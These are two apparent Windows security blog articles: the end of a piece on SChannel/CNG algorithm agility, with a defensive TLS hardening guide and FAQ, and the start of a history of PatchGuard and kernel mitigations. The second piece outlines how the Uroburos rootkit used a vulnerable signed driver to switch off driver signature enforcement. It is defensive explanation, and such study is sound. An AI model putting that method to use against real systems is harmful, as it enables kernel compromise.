The structural contrast with CNG: Apple's model gives the platform vendor very tight control over what is selectable and a clean deprecation path (you simply drop a constant from a future SDK), but the cost is that the application's algorithm options track the OS version the application is built for. CNG decouples those -- a Windows 11 application built against a 2015 Win32 SDK still sees new BCrypt algorithm strings as the OS ships them, because the dispatch is by string at runtime.

.NET `SslStream` -- one API, three host backends

.NET's System.Net.Security.SslStream is identical on every host. The implementation, however, delegates to the host operating system's TLS stack. On Windows it calls into SChannel through SSPI; on Linux it calls into OpenSSL via System.Security.Cryptography.Native.OpenSsl; on macOS it calls into Apple's Network framework via System.Security.Cryptography.Native.Apple [@dotnet-cross-platform-crypto]. There is no "pick a backend" knob in SslStream; the runtime picks whichever backend the host OS provides.

The agility consequence for PQC is direct. A .NET 10 application running on a Windows Insider build whose SChannel has X25519MLKEM768 enabled by default will negotiate hybrid PQC automatically. The same application running on macOS gets classical X25519 until Apple ships hybrid in Network framework. The same application running on Linux against OpenSSL 3.5 gets ML-KEM via OpenSSL's in-tree implementation. The application source code never changes; the wire-level cryptography is whatever the host's TLS stack negotiates. This is the agility property in cross-platform clothing -- and it works because each host's substrate is itself agile.

Five substrates, five answers

The cross-stack comparison surfaces the meta-point. Five substrates: CNG, OpenSSL OSSL_PROVIDER, BoringSSL's vendored tree, PKCS #11, Apple's named-enum SDK. Five answers, all functional, all optimising for different deployment models. SChannel / CNG is the most registry-driven and single-vendor-extensible; OpenSSL is the most context-explicit; PKCS #11 is the most cross-vendor-standardised; BoringSSL is the most aggressive-by-refusing-stability; Apple is the most named-enum-SDK-bound. None of these is "the right" answer -- each is the answer that fits its vendor's deployment shape. The agility property is of the substrate, and the right substrate depends on what you ship and to whom.

Agility is the capacity for rotation. Whether the rotation actually happens is a separate problem -- one that the empirical evidence of TLS 1.0 / 1.1's 25-year tail tells a sobering story about.

11. Limits and Open Problems

Algorithm agility is necessary. It is not sufficient. TLS 1.0 was published in 1999 [@rfc-2246]; default-off in stable Windows did not arrive until 2024-2025 [@ms-learn-tls-registry-settings]. Twenty-five years. The substrate could have rotated TLS 1.0 out a decade earlier; the world would not move.

Key idea: Agility lets the substrate add a new primitive and lets operators disable an old one. It cannot force operators of TLS-1.2-only or TLS-1.0-only endpoints to upgrade. The substrate solved the rotation problem; the world is the bottleneck. Trust-store distrust events, OS-level deprecation defaults, browser warnings, and eventual code-path removal are the levers that close the gap -- but each operates on the scale of years, not weeks.

This re-organises the reader's understanding of why Microsoft's posture on PQC is "ship and hedge" rather than "ship and declare victory." The substrate is ahead of the protocol; the protocol is ahead of the deployments; the deployments are years behind.

The downgrade-attack envelope

RFC 7568 (June 2015) formally prohibits SSL 3.0 [@rfc-7568]; RFC 6176 (March 2011) formally prohibits SSL 2.0 [@rfc-6176]. The TLS Fallback SCSV cipher suite (RFC 7507) bounded downgrade attacks within TLS 1.0 / 1.1 / 1.2. TLS 1.3's ServerHello.random downgrade-resistance sentinel (RFC 8446 §4.1.3 [@rfc-8446]) closes the downgrade attack surface within TLS 1.3. The remaining downgrade exposure lives at the boundary with TLS-1.2-only counterparties -- a boundary that shrinks every year but does not yet close.

Signature-side PQC and the chain-size problem

The PQC hybrid KEM transition is the easy half of the post-quantum migration. The signature side is harder. ML-DSA-65 produces ~3.3 KB signatures with ~2 KB public keys [@fips-204]; SLH-DSA at 128-bit security produces signatures in the 7 to 17 KB range [@fips-205]; Falcon (FN-DSA in the NIST nomenclature) produces ~1 KB signatures but is harder to implement correctly because of its floating-point Gaussian sampling.

Why this matters for SChannel: TLS server certificate chains are sent in the Certificate handshake message. A chain that fits inside TCP's initial congestion window (typically 10 segments, or about 14.6 KB) ships in one round trip; a chain that overflows the IW takes another RTT. Adding a 3.3 KB ML-DSA signature plus a 2 KB ML-DSA public key to every cert in a chain rapidly blows past 14.6 KB for a typical leaf-intermediate-root structure. The community working hypothesis is that the hybrid-signature transition in TLS will lag the hybrid-KEM transition by years; SymCrypt's Composite ML-DSA support (v103.12.0) [@symcrypt-changelog] is the substrate-side preparation for that transition, but the IETF TLS WG signature-side drafts are still in flight.

Composite-identifier namespace sprawl in CNG

Every hybrid construction adds at least one new CNG algorithm identifier. X25519MLKEM768, SecP256r1MLKEM768, SecP384r1MLKEM1024 already exist. Composite ML-DSA + ECDSA is in flight. If pure ML-KEM-1024 and pure SLH-DSA are eventually default-on, the algorithm namespace doubles per hybrid family. The substrate is capable of absorbing the sprawl; whether the cipher-suite registry remains legible to administrators is a separate user-interface problem.

The opaque-engine bargain

SymCrypt is open since July 2019 and externally auditable [@symcrypt-github]. The SChannel SSP binary itself remains closed-source. External behavioural verification -- Hubert Kario's tlsfuzzer -- is the closest the public has to a formal specification of schannel.dll's wire-level behaviour [@tlsfuzzer-github]. The project's framing is precise: it "doesn't check only that the system under test didn't crash, it checks that it returned correct error messages" [@tlsfuzzer-github]. That is the closest practitioners get to a behavioural spec without source.

The asymmetry has a name in the article's argument: open-source substrate, closed-source SSP. The agility receipts of Sections 5 and 9 are auditable at the primitive layer. The parsing-path correctness of Section 6 is not -- the coordinated-disclosure intake of MS14-066 (with IBM X-Force researcher Robert Freeman credited as the discoverer per the bulletin's acknowledgments [@ms14-066]) is the kind of receipt the binary-only delivery model can produce. Modern external fuzzing has narrowed the gap but does not close it.

Legacy protocol removal versus disablement

Disablement by default is universal in Windows 11 / Server 2022+. Removing the negotiation code paths is a separate, slower trajectory. SSL 3.0's code paths are largely gone from current SChannel; TLS 1.0 / 1.1 code paths remain reachable behind registry flags because some long-tail enterprise scenarios still require them. The protocol surface of SChannel is wider than its default-enabled surface; an audit posture must account for the difference.

Dead ends and the diseases they failed to cure

The five agility receipts of Section 5 are the primitive-rotation story. But not every TLS failure is a primitive failure, and the substrate could not save Windows from the four most-instructive engineering dead ends the IETF eventually had to legislate out of the protocol itself. CRIME / TLS-level DEFLATE compression (Rizzo and Duong, ekoparty 2012) was a compression-then-encryption side-channel that no primitive substitution could fix; TLS 1.3 removed compression from the protocol entirely (RFC 8446 §4.1.2 [@rfc-8446]) and SChannel never shipped TLS-level compression in the first place. Insecure renegotiation (CVE-2009-3555) -- Ray and Dispensa, November 2009 -- let an MITM splice attacker-prefix application data into a victim's authenticated session because the mid-session re-handshake had no transcript binding to the prior session; RFC 5746 (Eric Rescorla et al., February 2010 [@rfc-5746]) added the renegotiation_info extension, Microsoft shipped the fix in SChannel via KB977377 / KB980436 in early 2010, and TLS 1.3 removed renegotiation outright in favour of the narrowly-scoped KeyUpdate message and post-handshake CertificateRequest. Anonymous Diffie-Hellman cipher suites (TLS 1.0 through 1.2 specified TLS_DH_anon_* and TLS_ECDH_anon_* with no server certificate at all -- forward secrecy without authentication) were off-by-default in every major stack including SChannel and removed from the TLS 1.3 cipher-suite namespace entirely. Export-grade RSA / FREAK (Beurdouche, Bhargavan and colleagues, IEEE S&P 2015 [@smacktls]) used roughly $100 of EC2 compute to break 512-bit RSA in hours and force-downgrade non-export-aware servers; Microsoft pruned the export-RSA suites from SChannel's default set via MS15-031 / KB3046049 in March 2015 [@smacktls].

These four dead ends share a structural lesson: each is a different axis of failure. CRIME was a side-channel no algorithm could fix. Insecure renegotiation was a feature whose protocol design admitted MITM splicing. Anonymous DH was a configuration the protocol should never have exposed. FREAK was an obsolete primitive whose continued availability invited downgrade. All four sit above the substrate -- none is a primitive-design defect like MD5 or DES-56. The thesis the article advances -- that the substrate changed because it had to support the changes but did not invent them -- is illustrated negatively by these four: the protocol axis had to do the work, often by removal rather than refinement. The agility receipt of Section 5 G5 (TLS 1.0 / 1.1 disablement) is, in this light, just the most visible item in a longer ledger.

If the theoretical limits are humbling, the practical day-to-day -- "what should I actually do with my SChannel-served TLS endpoints this Monday morning?" -- has a much cleaner set of answers.

12. Practical Guide: Nine Things to Do on a Windows-Served TLS Endpoint

A working operator's reference distilled to the essentials -- the nine things that, if you do nothing else this quarter, materially improve the security posture of a Windows-served TLS endpoint.

1. Inventory

# Cipher suites enabled on this host, in negotiation order
Get-TlsCipherSuite | Select-Object -Property Name, Cipher, CipherLength, KeyType, Exchange

# ECC named groups (TLS 1.3 key shares; X25519, secp256r1, secp384r1; PQC hybrids on newer builds)
Get-TlsEccCurve

Pair this with a registry walk of HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\ -- Protocols\<ver>\<role>\Enabled and DisabledByDefault for protocol versions, Ciphers\<algorithm>\Enabled for primitive disables, and Hashes\<algorithm>\Enabled for handshake-hash disables [@ms-learn-tls-registry-settings].

2. Disable the legacy protocol versions

Set SCHANNEL\Protocols\SSL 3.0\<role>\Enabled = 0 and DisabledByDefault = 1 for both Client and Server sub-keys. Repeat for TLS 1.0 and TLS 1.1. The asymmetry between Client and Server hives bites: an outbound WinHTTP call from your IIS worker is governed by the Client sub-key even though the server itself is gated by Server [@ms-learn-tls-registry-settings].

3. Disable RC4 and 3DES at the cipher level

RC4: KB2868725 [@ms-advisory-2868725] introduced the mechanism. Set Ciphers\RC4 40/128\Enabled = 0, Ciphers\RC4 56/128\Enabled = 0, Ciphers\RC4 64/128\Enabled = 0, Ciphers\RC4 128/128\Enabled = 0. 3DES: Ciphers\Triple DES 168\Enabled = 0. Then verify with Get-TlsCipherSuite that no *RC4* or *3DES* suites are still listed.

4. Cipher-suite ordering for TLS 1.2

The SSL Cipher Suite Order GPO is the lever. Put ECDHE + AES-GCM suites at the top; keep CHACHA20-POLY1305 as a fallback for clients without AES-NI; pull legacy AES-CBC suites to the bottom. The Microsoft Learn "Manage TLS" page walks through the GPO interaction [@ms-learn-manage-tls].

Note: Setting an explicit cipher-suite order via the older SSL Cipher Suite Order GPO can accidentally exclude TLS 1.3 cipher suites if the list does not enumerate them. The TLS 1.3 suites (TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256) must appear in the configured list, otherwise TLS 1.3 effectively gets disabled on the host. Verify with Get-TlsCipherSuite after applying any GPO change.

5. Enable OCSP stapling on IIS, and enable CAPI2/Operational logging for distrust observability

OCSP stapling is on by default in modern IIS. Verify that your front door is sending stapled responses (via openssl s_client -status -connect host:443 < /dev/null | grep -i ocsp from a test client). If your CA does not support OCSP for the issued cert, the stapling fails silently and you lose the revocation channel; pick a CA that does.

For trust-store observability, enable the per-host CAPI2/Operational tracing channel with wevtutil sl Microsoft-Windows-CAPI2/Operational /e:true and watch for the chain-engine events the Microsoft Learn FCPCA-removal article enumerates: Event ID 11 (chain-build failures), Event ID 30 (SSL or NTAuth policy failures), Event ID 90 (every certificate consulted during chain build) [@ms-learn-fcpca-removal]. The FCPCA article also documents the empirical "one to seven days" propagation latency between an MTRP distrust landing in authrootstl.cab and a given client actually applying it -- the same window applies to any future CCADB-coordinated removal (cross-reference Section 7).

6. Enforce RunAsPPL and Credential Guard

These are complementary, not alternatives [@itm4n-runasppl]. Set HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1 and reboot; verify LSASS comes back as a Protected Process with Get-Process lsass | Select Name, Protect* [@ms-learn-lsa-protection]. Then enable Credential Guard via Group Policy or MDM; on most newer Windows 11 builds it is on by default [@ms-learn-credential-guard]. Auditing-only mode (AuditLevel) is the right step before enforcement to identify any legacy LSA plug-ins that fail to load as PPL.

7. Lock down CredSSP / RDP NLA on Remote Desktop Session Hosts

Confirm Network Level Authentication is enabled on any RDP Session Host (it has been default-on since Windows Server 2012 R2) [@ms-archive-nla]. Confirm the host is running CredSSP version 5 or higher, so the channel-binding hash mechanism that replaced the broken pre-CVE-2018-0886 "encrypt the public key + 1" scheme is in force [@ms-cssp-sequencing]. For any administrative jump-host scenario where the destination's plaintext-credential exposure must be zero, use Remote Credential Guard (TSRemoteGuardCreds) -- the destination receives only a service ticket usable for the session, not a reusable password or hash. Pair NLA enforcement with the certificate-validation knobs in item 5: the SChannel server certificate the CredSSP TLS handshake validates is the same one a TLS-only audit covers, so the trust pipeline reuse is exact.

8. FIPS-mode toggle: what `FipsAlgorithmPolicy = 1` actually means in 2026

The Local Security Policy setting "System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing" (registry: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\Enabled = 1) is the operator-side policy lever that pins SChannel, EFS, BitLocker, and RDP encryption to the FIPS 140-validated subset of CNG's catalog [@ms-learn-fips-policy]. The "what it disables" question has changed since the legacy "TLS_RSA_WITH_3DES_EDE_CBC_SHA only" framing on the policy reference page itself [@ms-learn-fips-policy]. The modern Microsoft Learn "TLS Cipher Suites in Windows 11" page is explicit that "FIPS-compliance has become more complex with the addition of elliptic curves making the FIPS mode enabled column in previous versions of this table misleading," and points readers to NIST SP 800-52 Rev. 2 section 3.3.1 for the authoritative FIPS-approved TLS 1.2 / 1.3 cipher-suite list [@ms-learn-tls-cipher-suites-windows-11][@nist-sp-800-52r2].

In practice on a Windows 11 / Server 2022 box with FipsAlgorithmPolicy = 1: SChannel will negotiate TLS 1.3's TLS_AES_128_GCM_SHA256 and TLS_AES_256_GCM_SHA384 (the third TLS 1.3 mandatory suite, TLS_CHACHA20_POLY1305_SHA256, is not FIPS-approved because ChaCha20-Poly1305 is not on the FIPS algorithm list); for TLS 1.2 it will negotiate the ECDHE-with-AES-GCM and ECDHE-with-AES-CBC-SHA2 variants over the NIST curves P-256, P-384, and P-521 only; the X25519 named group is not FIPS-approved as of the May 2026 Windows servicing snapshot; and the X25519MLKEM768 hybrid in Insider channels is not FIPS-approved either, because of the X25519 component.

Two-sided framing: SymCrypt's FIPS 140-3 validation is the engine-side receipt; FipsAlgorithmPolicy = 1 is the consumer-side policy lever that pins consumers to the validated subset. Both are required for the system to be "operating in FIPS mode" in the CMVP sense [@ms-learn-fips-140-validation]. At the BCrypt layer, FIPS enforcement is opt-in via a CNG flag that callers pass to BCryptOpenAlgorithmProvider; SChannel honours the system policy directly, but legacy applications loading deprecated CryptoAPI 1.0 CSPs (PROV_RSA_FULL, rsaenh.dll, etc.) bypass the toggle entirely [@ms-learn-cryptographic-provider-types].

Note: Enabling FipsAlgorithmPolicy = 1 is prospective only. It affects future BCrypt opens, future SChannel handshakes, and future EFS encryptions. It does not re-derive existing TLS session keys, does not re-encrypt existing EFS-protected files, and may break RDP between a FIPS-on Server 2022 host and a not-FIPS-configured Windows 10 1809 client because the two ends can no longer agree on a common cipher suite. Plan rollout carefully and verify mixed-version paths before flipping the bit fleet-wide.

9. Pilot the PQC hybrid where you can

Where Windows builds support X25519MLKEM768 -- presently Insider Preview channels per the CNG ML-KEM page's banner [@ms-learn-cng-mlkem-examples] -- pilot the hybrid against an internal client. Validate via Wireshark (looking for the X25519MLKEM768 named-group selector in ClientHello / ServerHello key_share extensions) and a curl build with ML-KEM support. Measure connection-establishment latency; for a typical handshake the additional ~5-10 ms is in the noise (see the §9 PQC handshake budget Callout for the TPM-bound exception).

The `X25519MLKEM768` named group has IANA codepoint `0x11ec`. A Wireshark display filter of `tls.handshake.extensions_key_share_group == 0x11ec` flags handshakes that negotiated the hybrid. Combined with `tls.handshake.version == 0x0304`, you can quickly spot whether a peer actually used the PQC hybrid or fell back to plain X25519.

Common pitfalls

Client vs Server asymmetry. Two sub-keys, two hives, four registry edits per protocol version. Tooling like IISCrypto automates the matrix; doing it by hand is the most common source of "we thought we disabled TLS 1.0 but our outbound WinHTTP still negotiates it" tickets.
SCH_USE_STRONG_CRYPTO -- the SCHANNEL_CRED flag is per-call, not per-machine. .NET sets it by default on modern targets but historically didn't on .NET Framework 4.5.x. If you maintain old .NET Framework workloads, audit them.
SSLKEYLOGFILE -- SChannel does not export keys to SSLKEYLOGFILE. Wireshark cannot decrypt SChannel-served TLS traffic without separate key extraction (etw-based, or a TLS-terminating proxy). Plan your packet-capture strategy accordingly.

If the practical guide is the "what to do," the FAQ that follows is the "what to stop believing."

13. Frequently Asked Questions

No. They were different bugs, different stacks, different vendors. **Heartbleed (CVE-2014-0160), April 7, 2014, was a flaw in OpenSSL's TLS Heartbeat extension code path** [@nvd-cve-2014-0160]. **MS14-066 / CVE-2014-6321 ("WinShock"), November 11, 2014, was a pre-authentication remote code execution in SChannel's TLS message-parsing path** [@ms14-066][@nvd-cve-2014-6321], disclosed under coordinated vulnerability disclosure and credited by IBM X-Force to researcher Robert Freeman. SChannel does not implement OpenSSL's Heartbeat code and was not affected by Heartbleed; Microsoft confirmed this publicly in April 2014. The two events have been blended in many secondary accounts since. No. CVE-2014-6321 had a public Patch Tuesday bulletin (MS14-066, November 11, 2014) [@ms14-066], a US-CERT alert (TA14-318A, November 18, 2014) [@uscert-ta14-318a], and a CERT/CC vulnerability note (VU#505120) [@certcc-vu505120]. The "silently patched" framing in some accounts refers to the *additional* SChannel hardening fixes Microsoft bundled into the same KB without separate bulletins, not to the headline CVE itself. This article does not assign specific CVE IDs to those bundled extras. No. **ZeroLogon affected the Netlogon Remote Protocol (MS-NRPC), implemented in `netlogon.dll`**. The "Netlogon secure channel" and the "SChannel SSP" (`schannel.dll`, the TLS provider this article is about) share a name root but are different protocols, different DLLs, different code paths, and different bug classes. Confusing the two is one of the most common Windows-security naming traps. Yes -- they are complementary, not alternatives [@itm4n-runasppl]. **PPL is a same-privilege gate inside Virtual Trust Level 0 (VTL0)**: it stops a non-PPL process from opening LSASS for memory read [@ms-learn-lsa-protection]. **Credential Guard moves credential material into the `LSAIso` trustlet at VTL1**, behind the VBS / Hyper-V boundary [@ms-learn-credential-guard]. They protect against different threats and stack rather than substitute. No. The Microsoft Learn page for the CNG ML-KEM API carries an explicit "prerelease product / Windows Insider Preview" banner as of mid-2026 [@ms-learn-cng-mlkem-examples]. The primitive ships in SymCrypt v103.5.0 and later [@symcrypt-changelog]; the CNG and SChannel surfaces are rolling through the Insider channel. Track the Microsoft Tech Community PQC posts for OS-channel GA announcements [@ms-tech-community-pqc][@ms-tech-community-pqc-companion]. On Windows, yes. On Linux .NET delegates `SslStream` to OpenSSL; on macOS it uses Apple's Network framework. PQC support follows the underlying stack, so the same .NET binary's TLS posture differs by host OS in mid-2026. Because the *agility property* the article is about is anchored to CNG, which shipped in Vista in January 2007 [@ms-learn-cng-portal] -- about nineteen years to mid-2026. Pre-CNG SChannel was not algorithm-agile in any meaningful sense: primitives were baked into CryptoAPI 1.0 CSP DLLs, ECC could not be expressed in the `ALG_ID + key BLOB` model at all, and adding a new algorithm required a CSP rev plus an OS release. CNG is when "rotate every cipher" stopped being a slogan and started being a property the substrate could deliver. The thirty-year framing would be arithmetically accurate but argumentatively wrong.

The Microsoft TLS stack has spent twenty years proving that one architectural decision -- decouple algorithms from DLLs, addressed by string identifier through a stable provider model -- can carry a vendor through every primitive rotation cryptography throws at it. The receipts now include a post-quantum hybrid key exchange that runs through the same dispatch path Vista shipped in 2007. The next test, the signature-side PQC transition, is already in flight inside SymCrypt. Whatever the world chooses to do with those primitives, the substrate is ready.

The Same-Privilege Paradox: Twenty-One Years of Windows Kernel Self-Defense

noreply@paragmali.com (Parag Mali) — Wed, 03 Jun 2026 00:00:00 GMT

Microsoft has spent twenty-one years defending the Windows kernel from itself. PatchGuard, KASLR, KDP, and the Win32k Lockdown are four answers to a single problem -- the **same-privilege paradox**, that a defense at the attacker's privilege level cannot succeed in principle. The trajectory is migration: from in-kernel obfuscation (PatchGuard, 2005), to address-space tricks (KASLR 2007, KVA Shadow 2018), to hypervisor-anchored isolation (KDP, 2020), and finally to attack-surface deletion (Win32k filter, 2017). Microsoft's own Security Servicing Criteria say PatchGuard is not a security boundary [@ms-servicing-criteria], and that admission is the load-bearing premise of every modern Windows kernel mitigation.

1. If the attacker is already in the kernel, what is left to defend?

For three years, a Russian-attributed espionage rootkit called Uroburos ran on Microsoft's most heavily defended kernel -- the 64-bit Windows kernel with PatchGuard active -- and PatchGuard never made a sound [@gdata-uroburos-blog]. The reason is the one the marketing copy will not tell you: PatchGuard is not, and was never designed to be, a security boundary; Microsoft says so in its own Security Servicing Criteria [@ms-servicing-criteria]. The twenty-one-year history of Windows kernel self-defense is the story of why the answer to "the kernel cannot defend itself from itself" turned out to be "stop trying to defend it from inside."

That sentence will read like editorial provocation until you see the architecture. Uroburos did not bypass PatchGuard. It side-stepped it. The rootkit shipped a signed-but-vulnerable copy of Oracle's VBoxDrv.sys, used the vulnerability to flip the g_CiEnabled flag that gates Driver Signature Enforcement, loaded its own unsigned kernel driver, and then operated alongside PatchGuard for three years (2011 -- 2014) without ever modifying anything PatchGuard checked [@gdata-uroburos-blog] [@stmxcsr-turla]. The Stage 2 evolution survey calls this the canonical refutation of the most common reader misconception about PatchGuard: not "PatchGuard was broken" but "PatchGuard's protected-structure list is, by construction, narrower than the kernel-modification surface."

A defense that shares its CPU privilege level with the attacker can in principle always be subverted by an attacker at that privilege level, because every code path and data structure the defense relies on is, by construction, mutable by the attacker. The paradox is not a formal impossibility theorem in the cryptographic sense, but it is the de facto design constraint Microsoft has acknowledged in writing through its Security Servicing Criteria [@ms-servicing-criteria]. A Microsoft kernel feature that periodically verifies a fixed list of kernel structures -- the SSDT, IDT, GDT, syscall MSRs, the in-memory `nt` and `hal` images, and select processor control registers -- and bug-checks the system with stop code `CRITICAL_STRUCTURE_CORRUPTION` (0x109) on mismatch. Introduced April 25, 2005 in Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition; never shipped on x86 [@ms-advisory-932596] [@ms-driver-x64-restrictions]. PatchGuard is an *engineering deterrent*, not a security boundary.

This article covers four mitigations across twenty-one years -- April 25, 2005, when PatchGuard shipped with Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition [@ms-advisory-932596], through June 2026, when kCET and the VTL1-anchored stack are the front line. The four mitigations are PatchGuard (KPP), KASLR (and its 2018 successor KVA Shadow), KDP (Kernel Data Protection), and the two-stage Win32k Lockdown that began in 2012 with DisallowWin32kSystemCalls and resolved in 2017 with Win32kSystemCallFilter [@ms-syscall-disable-policy] [@ms-syscall-filter-policy]. They do not look like they belong together until you notice the direction. Each generation moves the defense one step further away from where the attacker lives: from in-kernel obfuscation, to address-space tricks, to hypervisor-anchored isolation (VTL1), to attack-surface deletion.

Key idea: Every meaningful Windows kernel mitigation since 2017 has moved the enforcement to a privilege level the kernel-mode attacker cannot reach -- hypervisor (VTL1), CPU silicon (KTRR on Apple, kCET shadow stack hardware on Intel / AMD), or out of the syscall surface entirely. The reason is the same-privilege paradox: a defense that lives where the attacker lives cannot, in principle, succeed.

Four misconceptions are worth retiring before we start. First, "PatchGuard is the load-bearing kernel-rootkit defense"; in fact, Microsoft says it is not a security boundary at all, and Uroburos operated alongside it for three years. Second, "PatchGuard is x64-only"; the documentation is x64-centric, but in 2026 PatchGuard also runs on 64-bit ARM Windows -- the one architectural truth in the framing is that PatchGuard never shipped on 32-bit Windows. Third, "KASLR is dead because entropy is the variable that matters"; the Hund-Willems-Holz 2013 result and Gruss et al. 2017 generalization showed that randomness was never the load-bearing defense -- structural unreachability is [@doi-hund-2013] [@gruss-kaiser-pdf]. Fourth, "Win32k Lockdown killed half the LPE class"; the lockdown removes roughly the historically-vulnerable syscall surface from sandboxed renderers specifically, not from the operating system in general [@pz-breaking-chain].

To see why Microsoft has spent twenty-one years on a problem that, by their own admission, has no in-kernel answer, we have to go back to April 25, 2005 -- and to the architectural break that made the new contract politically possible.

2. Why Microsoft built PatchGuard at all (1998 -- 2005)

Before April 2005, the Windows kernel was a public hooking surface by design. McAfee, Symantec, F-Secure, and Trend Micro patched the System Service Descriptor Table (SSDT), hooked the Interrupt Descriptor Table (IDT), and inline-patched nt!Nt* system-service routines as legitimate engineering practice. The same primitives, applied with malicious intent, became the rootkit canon of the late 1990s and early 2000s: NTRootkit, FU, Hacker Defender. From the operating system's point of view, the defender and the attacker were architecturally indistinguishable.

A kernel data structure on Windows containing function pointers to every system service routine (the `Nt*` functions that implement system calls). On 32-bit Windows, anti-virus vendors routinely patched the SSDT to intercept system calls before the kernel processed them. On x64, modifying the SSDT is prohibited and PatchGuard treats it as a `CRITICAL_STRUCTURE_CORRUPTION` event [@ms-driver-x64-restrictions].

The symmetry was awkward enough in normal operation. It became politically untenable in October 2005, when Mark Russinovich discovered that Sony BMG's XCP DRM software, shipped on tens of millions of audio CDs, installed an actual cloaking rootkit on consumer Windows machines.Russinovich's October 31, 2005 Sysinternals post "Sony, Rootkits and Digital Rights Management Gone Too Far" turned a niche kernel-internals topic into national news within a week. The lawsuit settlements and CD recall that followed established, in pop-culture terms, the symmetry between "legitimate kernel hooking" and "malware kernel hooking" that the security industry had been arguing about for years. The XCP code was structurally identical to malware -- it hid files whose names began with $sys$ , modified system calls, and resisted removal -- and it shipped under a Sony certificate.

What Microsoft needed was an architectural break large enough that they could rewrite the kernel contract without having to honor the old one. They got it from AMD. The x64 architecture, productised as AMD64 and adopted by Intel as EM64T, was Microsoft's once-in-a-decade chance to publish a new contract incompatible with the old. Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition shipped on April 25, 2005 [@ms-advisory-932596]. The new kernel-mode contract had two enforcement layers. PatchGuard was the engineering enforcement -- the code that periodically inspected the kernel's most sensitive structures and bug-checked the system on mismatch. Kernel-Mode Code Signing (KMCS) was the policy enforcement -- the rule that production x64 kernels would load only Authenticode-signed drivers.

The policy on 64-bit Windows that the kernel will load only Authenticode-signed kernel drivers in production (test-signing modes exist for development). KMCS shipped with the same April 2005 release as PatchGuard and is its policy counterpart -- KMCS controls what code enters the kernel; PatchGuard checks the kernel structures the loaded code is expected to leave alone [@ms-driver-x64-restrictions].

The combination did exactly what the AV industry feared. Their entire detection methodology was, by the new contract, illegal on x64. McAfee bought a full-page ad in the Financial Times in October 2006 to call Microsoft's behaviour anti-competitive. Symantec joined the EC complaint. The verbatim industry framing was delivered by Vincent Weafer, then Symantec's senior director of security response, in a CRN report: "Either everybody has access to the kernel or nobody has access to the kernel -- and we believe in the latter" [@crn-mcafee-symantec]. Microsoft declined to publish a signed bypass API. By the time the dust settled, the AV-vendor hooking pattern on Windows had been industrially ended.

Either everybody has access to the kernel or nobody has access to the kernel -- and we believe in the latter. -- Vincent Weafer, Symantec, quoted in CRN, September 25, 2006 [@crn-mcafee-symantec]. McAfee and Symantec argued that Vista x64 plus PatchGuard locked third-party security vendors out of the kernel while Microsoft's own Windows Defender remained free to ship integrations Microsoft had not exposed to anyone else. The EC investigation eventually closed without forcing Microsoft to expose a signed bypass API. The 2024 CrowdStrike Falcon outage -- where a single bad signature update propagated through a kernel driver and bricked an estimated 8.5 million Windows machines worldwide -- is now widely read, retroactively, as vindication of Microsoft's 2006 position. The argument that "everybody or nobody" has kernel access turned out to have a third answer: "as few people as possible, with as small a kernel footprint as possible, mediated by user-mode brokers." That is the design move the rest of this article is about.

The historical record has one quirk worth flagging. No primary 2005 PatchGuard launch document is preserved in Microsoft's current documentation surface; the earliest official primary is Microsoft Security Advisory 932596 from August 2007, which describes Kernel Patch Protection as protecting "code and critical structures in the Windows kernel from modification by unknown code or data" and announces an upcoming PatchGuard update [@ms-advisory-932596]. The technical detail of what PatchGuard checked was reverse-engineered by the offensive security community before Microsoft documented it.

gantt title Windows kernel self-defense, 2005-2026 dateFormat YYYY-MM section Same-privilege (CPL=0) PatchGuard v1 :2005-04, 2008-02 PatchGuard v2-v3 :2006-11, 2010-10 PatchGuard v7-v8 :2012-08, 2026-06 KASLR (8-bit entropy) :2007-01, 2018-01 section CPU mediated KVA Shadow :2018-01, 2026-06 kCET / shadow stack :2022-09, 2026-06 section VTL1 anchored HVCI :2015-07, 2026-06 kCFG with VBS bitmap :2017-04, 2026-06 KDP static plus dynamic :2020-05, 2026-06 section Surface deletion DisallowWin32kSystemCalls:2012-08, 2017-10 Win32kSystemCallFilter :2017-10, 2026-06

So the contract was published, the kernel was no longer a public hooking surface, and Microsoft shipped a feature called PatchGuard that ran inside the kernel and checked the kernel's most sensitive structures. The question Skywing and skape would publish nine months later was the question everybody in offensive security had been waiting for: how do you defend a kernel from inside the kernel?

3. PatchGuard v1 and v2: obfuscation as defense (2005 -- 2008)

PatchGuard v1 was an engineering answer to a political problem. It worked exactly the way a defense works if you do not state out loud that the attacker is in the same address space: a periodic timer fired, a checksum was recomputed, a mismatch caused the machine to bug-check with stop code CRITICAL_STRUCTURE_CORRUPTION (0x109), and the assumption was that the cost of figuring out which timer, which checksum, and which DPC handler was high enough to deter casual rootkit authors. And for nine months, that was the story.

The Windows bug-check stop code raised by PatchGuard when one of its periodic integrity checks detects an unexpected modification to a protected kernel structure. The bug-check call goes through `KeBugCheckEx`, which on later PatchGuard generations is itself a protected structure -- swallowing the bug-check from a hooked `KeBugCheckEx` was one of the four bypass classes Skywing and skape catalogued in 2005 [@uninformed-v3-archive].

What does PatchGuard actually check? The protected-structure list has grown across generations, but the core, as Microsoft documents it for driver authors, has been remarkably stable [@ms-driver-x64-restrictions]:

The SSDT and KeServiceDescriptorTable[Shadow] (the function-pointer tables that dispatch system calls)
The Interrupt Descriptor Table (IDT), read from the CPU via IDTR
The Global Descriptor Table (GDT), read from the CPU via GDTR
The syscall-related model-specific registers: IA32_LSTAR, IA32_STAR, IA32_CSTAR, and the IA32_SYSENTER_* family
The in-memory nt and hal kernel images (so you cannot inline-patch nt!NtCreateFile)
KdpStub, KeBugCheckCallbackHead, and other kernel call-back tables
Select processor control registers and debug registers

Mechanism: a context block built by nt!KiInitializePatchGuard at boot, scattered across allocations, XOR-encrypted; a DPC-driven verifier routine that fires at randomized intervals; a per-fire recomputation of expected checksums; a KeBugCheckEx(0x109, ...) call on any mismatch. The load-bearing property of the design -- the one that drives the rest of the story -- is that the defense lives at CPL=0, alongside the attacker. The verifier, the keys, the schedule, the bug-check routine itself: all of it lives in the same address space as the rootkit it is meant to detect.

